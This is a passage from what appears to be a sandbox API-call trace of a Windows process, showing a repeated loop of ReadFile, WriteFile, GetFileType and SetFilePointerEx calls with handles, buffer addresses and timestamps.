lpNumberOfBytesRead=0x2ce3a8*=0x200, lpOverlapped=0x0) returned 1 [0142.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.555] GetFileType (hFile=0x4c) returned 0x1 [0142.556] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.556] GetFileType (hFile=0x4c) returned 0x1 [0142.556] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.556] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf1b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.557] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.557] GetFileType (hFile=0x4c) returned 0x1 [0142.557] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.557] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf208*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf208*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.557] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.557] GetFileType (hFile=0x4c) returned 0x1 [0142.557] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.557] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf258*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf258*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.557] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.557] GetFileType (hFile=0x4c) returned 0x1 [0142.557] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.557] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.557] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.557] GetFileType (hFile=0x4c) returned 0x1 [0142.557] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.557] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf2f8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.558] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.558] GetFileType (hFile=0x4c) returned 0x1 [0142.558] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.558] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf348*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf348*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.558] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.558] GetFileType (hFile=0x4c) returned 0x1 [0142.558] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.558] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf398*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf398*, lpNumberOfBytesWritten=0x2ce39c*=0x20, lpOverlapped=0x0) returned 1 [0142.558] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.558] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce388 | out: lpNewFilePointer=0x0) returned 1 [0142.558] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.558] ReadFile (in: hFile=0x54, lpBuffer=0x2cf1b8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce3a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b8*, lpNumberOfBytesRead=0x2ce3a8*=0x200, lpOverlapped=0x0) returned 1 [0142.558] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.558] GetFileType (hFile=0x4c) returned 0x1 [0142.558] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.558] GetFileType (hFile=0x4c) returned 0x1 [0142.558] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.558] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf1b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.558] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.558] GetFileType (hFile=0x4c) returned 0x1 [0142.558] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.558] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf208*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf208*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.558] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.558] GetFileType (hFile=0x4c) returned 0x1 [0142.558] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.558] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf258*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf258*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.558] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.558] GetFileType (hFile=0x4c) returned 0x1 [0142.559] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.559] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.559] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.559] GetFileType (hFile=0x4c) returned 0x1 [0142.559] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.559] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf2f8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.559] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.559] GetFileType (hFile=0x4c) returned 0x1 [0142.559] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.559] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf348*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf348*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.559] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.559] GetFileType (hFile=0x4c) returned 0x1 [0142.559] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.559] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf398*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf398*, lpNumberOfBytesWritten=0x2ce39c*=0x20, lpOverlapped=0x0) returned 1 [0142.559] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.559] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce388 | out: lpNewFilePointer=0x0) returned 1 [0142.559] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.559] ReadFile (in: hFile=0x54, lpBuffer=0x2cf1b8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce3a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b8*, lpNumberOfBytesRead=0x2ce3a8*=0x200, lpOverlapped=0x0) returned 1 [0142.559] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.559] GetFileType (hFile=0x4c) returned 0x1 [0142.559] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.559] GetFileType (hFile=0x4c) returned 0x1 [0142.559] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.559] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf1b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.559] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.559] GetFileType (hFile=0x4c) returned 0x1 [0142.559] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.559] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf208*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf208*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.560] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.560] GetFileType (hFile=0x4c) returned 0x1 [0142.560] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.560] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf258*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf258*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.560] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.560] GetFileType (hFile=0x4c) returned 0x1 [0142.560] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.560] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.560] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.560] GetFileType (hFile=0x4c) returned 0x1 [0142.560] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.560] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf2f8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.560] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.560] GetFileType (hFile=0x4c) returned 0x1 [0142.560] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.560] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf348*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf348*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.560] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.560] GetFileType (hFile=0x4c) returned 0x1 [0142.560] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.560] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf398*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf398*, lpNumberOfBytesWritten=0x2ce39c*=0x20, lpOverlapped=0x0) returned 1 [0142.560] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.560] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce388 | out: lpNewFilePointer=0x0) returned 1 [0142.561] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.561] ReadFile (in: hFile=0x54, lpBuffer=0x2cf1b8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce3a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b8*, lpNumberOfBytesRead=0x2ce3a8*=0x200, lpOverlapped=0x0) returned 1 [0142.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.561] GetFileType (hFile=0x4c) returned 0x1 [0142.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.561] GetFileType (hFile=0x4c) returned 0x1 [0142.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.561] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf1b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.561] GetFileType (hFile=0x4c) returned 0x1 [0142.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.561] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf208*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf208*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.561] GetFileType (hFile=0x4c) returned 0x1 [0142.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.561] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf258*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf258*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.561] GetFileType (hFile=0x4c) returned 0x1 [0142.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.561] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.561] GetFileType (hFile=0x4c) returned 0x1 [0142.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.561] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf2f8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.561] GetFileType (hFile=0x4c) returned 0x1 [0142.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.561] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf348*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf348*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.562] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.562] GetFileType (hFile=0x4c) returned 0x1 [0142.562] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.562] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf398*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf398*, lpNumberOfBytesWritten=0x2ce39c*=0x20, lpOverlapped=0x0) returned 1 [0142.562] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.563] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce388 | out: lpNewFilePointer=0x0) returned 1 [0142.565] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.565] ReadFile (in: hFile=0x54, lpBuffer=0x2cf1b8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce3a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b8*, lpNumberOfBytesRead=0x2ce3a8*=0x200, lpOverlapped=0x0) returned 1 [0142.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.565] GetFileType (hFile=0x4c) returned 0x1 [0142.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.565] GetFileType (hFile=0x4c) returned 0x1 [0142.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.566] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf1b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.566] GetFileType (hFile=0x4c) returned 0x1 [0142.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.566] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf208*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf208*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.566] GetFileType (hFile=0x4c) returned 0x1 [0142.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.566] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf258*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf258*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.566] GetFileType (hFile=0x4c) returned 0x1 [0142.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.566] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.566] GetFileType (hFile=0x4c) returned 0x1 [0142.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.566] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf2f8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.566] GetFileType (hFile=0x4c) returned 0x1 [0142.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.566] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf348*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf348*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.567] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.567] GetFileType (hFile=0x4c) returned 0x1 [0142.567] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.567] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf398*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf398*, lpNumberOfBytesWritten=0x2ce39c*=0x20, lpOverlapped=0x0) returned 1 [0142.567] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.567] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce388 | out: lpNewFilePointer=0x0) returned 1 [0142.567] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.567] ReadFile (in: hFile=0x54, lpBuffer=0x2cf1b8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce3a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b8*, lpNumberOfBytesRead=0x2ce3a8*=0x200, lpOverlapped=0x0) returned 1 [0142.567] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.567] GetFileType (hFile=0x4c) returned 0x1 [0142.567] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.567] GetFileType (hFile=0x4c) returned 0x1 [0142.567] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.567] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf1b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.567] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.567] GetFileType (hFile=0x4c) returned 0x1 [0142.567] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.567] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf208*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf208*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.567] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.567] GetFileType (hFile=0x4c) returned 0x1 [0142.567] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.567] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf258*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf258*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.567] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.567] GetFileType (hFile=0x4c) returned 0x1 [0142.568] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.568] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.568] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.568] GetFileType (hFile=0x4c) returned 0x1 [0142.568] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.568] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf2f8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.568] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.568] GetFileType (hFile=0x4c) returned 0x1 [0142.568] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.568] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf348*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf348*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.568] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.568] GetFileType (hFile=0x4c) returned 0x1 [0142.568] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.568] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf398*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf398*, lpNumberOfBytesWritten=0x2ce39c*=0x20, lpOverlapped=0x0) returned 1 [0142.568] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.568] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce388 | out: lpNewFilePointer=0x0) returned 1 [0142.568] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.568] ReadFile (in: hFile=0x54, lpBuffer=0x2cf1b8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce3a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b8*, lpNumberOfBytesRead=0x2ce3a8*=0x200, lpOverlapped=0x0) returned 1 [0142.568] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.568] GetFileType (hFile=0x4c) returned 0x1 [0142.568] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.568] GetFileType (hFile=0x4c) returned 0x1 [0142.568] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.568] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf1b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.569] GetFileType (hFile=0x4c) returned 0x1 [0142.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.569] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf208*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf208*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.569] GetFileType (hFile=0x4c) returned 0x1 [0142.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.569] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf258*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf258*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.569] GetFileType (hFile=0x4c) returned 0x1 [0142.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.569] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.569] GetFileType (hFile=0x4c) returned 0x1 [0142.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.569] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf2f8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.569] GetFileType (hFile=0x4c) returned 0x1 [0142.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.569] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf348*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf348*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.569] GetFileType (hFile=0x4c) returned 0x1 [0142.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.570] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf398*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf398*, lpNumberOfBytesWritten=0x2ce39c*=0x20, lpOverlapped=0x0) returned 1 [0142.570] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.570] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce388 | out: lpNewFilePointer=0x0) returned 1 [0142.570] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.570] ReadFile (in: hFile=0x54, lpBuffer=0x2cf1b8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce3a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b8*, lpNumberOfBytesRead=0x2ce3a8*=0x200, lpOverlapped=0x0) returned 1 [0142.570] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.570] GetFileType (hFile=0x4c) returned 0x1 [0142.570] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.570] GetFileType (hFile=0x4c) returned 0x1 [0142.570] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.570] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf1b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.570] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.570] GetFileType (hFile=0x4c) returned 0x1 [0142.570] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.570] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf208*, nNumberOfBytesToWrite=0x50, 